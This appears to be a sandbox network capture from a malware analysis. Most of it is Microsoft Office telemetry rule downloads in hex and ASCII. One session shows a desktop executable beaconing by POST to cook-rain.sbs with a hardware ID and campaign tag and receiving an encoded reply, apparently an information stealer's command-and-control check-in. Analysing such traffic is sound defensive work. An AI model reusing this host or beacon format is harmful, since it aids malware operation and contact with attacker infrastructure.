                                                                                                                                                                              ETag: "0x8DC582B9E8EE0F3"
                                                                                                                                                                              x-ms-request-id: 70a27cfc-201e-0051-268c-3a7340000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073028Z-178bfbc474bxkclvhC1NYC69g400000000z000000000kbgz
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:28 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              34192.168.2.64974513.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:28 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:28 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:28 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 468
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                              ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                              x-ms-request-id: 70a27cfa-201e-0051-248c-3a7340000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073028Z-1777c6cb754ww792hC1TEBzqu40000000apg000000004v2b
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:28 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              35192.168.2.64974613.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:28 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:29 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 428
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                                                                                                                                              ETag: "0x8DC582BAC4F34CA"
                                                                                                                                                                              x-ms-request-id: 947c7cf8-001e-00a2-018c-3ad4d5000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073029Z-1777c6cb7544n7p6hC1TEByvb40000000az00000000041vd
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:29 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              36192.168.2.64974813.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:30 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:30 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 499
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                                                                                                                                                              ETag: "0x8DC582B98CEC9F6"
                                                                                                                                                                              x-ms-request-id: be70ec4e-301e-000c-088c-3a323f000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073030Z-1777c6cb7549x5qchC1TEBggbg0000000avg000000006wa1
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:30 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              37192.168.2.64975013.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:30 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:30 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:30 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 471
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                              ETag: "0x8DC582BB5815C4C"
                                                                                                                                                                              x-ms-request-id: a24720e5-f01e-0096-3f65-3b10ef000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073030Z-178bfbc474btvfdfhC1NYCa2en000000014000000000kkh4
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:30 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              38192.168.2.64974913.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:30 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:30 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:30 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 415
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                              ETag: "0x8DC582B988EBD12"
                                                                                                                                                                              x-ms-request-id: 7f65af6f-801e-0067-5f8c-3afe30000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073030Z-1777c6cb754gc8g6hC1TEB966c0000000at00000000082nc
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:30 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              39192.168.2.64975113.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:30 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:31 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:30 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 419
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                                                                              ETag: "0x8DC582BB32BB5CB"
                                                                                                                                                                              x-ms-request-id: a8d62205-901e-0083-0c0e-3bbb55000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073030Z-1777c6cb754mqztshC1TEB4mkc0000000awg000000003h70
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              X-Cache-Info: L1_T2
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:31 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              40192.168.2.64975213.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:31 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:31 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:31 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 494
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                              ETag: "0x8DC582BB8972972"
                                                                                                                                                                              x-ms-request-id: ea8695b1-901e-002a-7283-3b7a27000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073031Z-1777c6cb7544n7p6hC1TEByvb40000000b0g000000000n0z
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                              2024-11-21 07:30:31 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                              41192.168.2.649756188.114.96.34433180C:\Users\user\Desktop\file.exe
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:32 UTC261OUTPOST /api HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                              Content-Length: 88
                                                                                                                                                                              Host: cook-rain.sbs
                                                                                                                                                                              2024-11-21 07:30:32 UTC88OUTData Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d 26 68 77 69 64 3d 34 39 33 37 32 30 44 35 36 34 45 34 46 30 43 42 36 33 43 46 43 46 37 45 36 43 34 35 46 38 33 38
                                                                                                                                                                              Data Ascii: act=get_message&ver=4.0&lid=LOGS11--LiveTraffic&j=&hwid=493720D564E4F0CB63CFCF7E6C45F838
                                                                                                                                                                              2024-11-21 07:30:32 UTC976INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:32 GMT
                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Set-Cookie: PHPSESSID=ssp068kchq1udc6h88in22jnr1; expires=Mon, 17-Mar-2025 01:17:11 GMT; Max-Age=9999999; path=/
                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                              CF-Cache-Status: DYNAMIC
                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mv8g41vibNhhrTxShv7Y2wBGzQmAbYKAlxqXAn2da6XbgcRZk8qzv3C4GM3VITpjTWLIJly7PSuqVrcCeIICrH2LkOmr2l%2B5fRKwZSz8QBGo5vsN43faaGvd9GfI86nK"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                              CF-RAY: 8e5ef9993ba30f68-EWR
                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1489&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=985&delivery_rate=1917268&cwnd=230&unsent_bytes=0&cid=3ac2be38330f6683&ts=731&x=0"
                                                                                                                                                                              2024-11-21 07:30:32 UTC214INData Raw: 64 30 0d 0a 79 36 64 58 47 53 74 75 66 72 6c 54 34 74 55 59 59 2f 71 73 61 53 7a 56 76 32 74 39 58 42 35 69 51 36 52 78 79 5a 64 51 41 56 36 51 33 48 56 73 43 56 52 63 30 53 65 57 70 53 49 2f 31 66 42 47 48 65 32 4b 52 55 39 74 4b 30 78 79 6c 55 4c 6e 70 6d 5a 64 63 61 54 42 4d 55 55 45 43 68 76 66 66 59 65 74 66 55 48 57 6a 67 39 59 39 34 56 62 55 58 35 37 51 48 6d 56 44 4f 58 73 63 6e 52 38 38 59 55 2f 62 56 38 65 52 4f 56 38 76 76 6f 70 57 38 2b 43 57 78 33 67 6b 56 70 4d 62 7a 42 54 64 66 68 65 75 75 4d 31 59 44 4f 58 69 43 56 34 52 51 6f 52 31 48 32 48 72 58 31 42 31 6f 34 50 57 50 65 46 57 31 46 2b 65 30 42 35 6c 51 79 55 0d 0a
                                                                                                                                                                              Data Ascii: d0y6dXGStufrlT4tUYY/qsaSzVv2t9XB5iQ6RxyZdQAV6Q3HVsCVRc0SeWpSI/1fBGHe2KRU9tK0xylULnpmZdcaTBMUUEChvffYetfUHWjg9Y94VbUX57QHmVDOXscnR88YU/bV8eROV8vvopW8+CWx3gkVpMbzBTdfheuuM1YDOXiCV4RQoR1H2HrX1B1o4PWPeFW1F+e0B5lQyU
                                                                                                                                                                              2024-11-21 07:30:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                              42192.168.2.64975313.107.246.45443
                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                              2024-11-21 07:30:32 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                              Accept-Encoding: gzip
                                                                                                                                                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                              Host: otelrules.azureedge.net
                                                                                                                                                                              2024-11-21 07:30:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                              Date: Thu, 21 Nov 2024 07:30:32 GMT
                                                                                                                                                                              Content-Type: text/xml
                                                                                                                                                                              Content-Length: 420
                                                                                                                                                                              Connection: close
                                                                                                                                                                              Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                              ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                              x-ms-request-id: 65766a9d-a01e-0002-6d8c-3a5074000000
                                                                                                                                                                              x-ms-version: 2018-03-28
                                                                                                                                                                              x-azure-ref: 20241121T073032Z-178bfbc474b7cbwqhC1NYC8z4n000000010000000000ct6r
                                                                                                                                                                              x-fd-int-roxy-purgeid: 0
                                                                                                                                                                              X-Cache: TCP_HIT
                                                                                                                                                                              Accept-Ranges: bytes
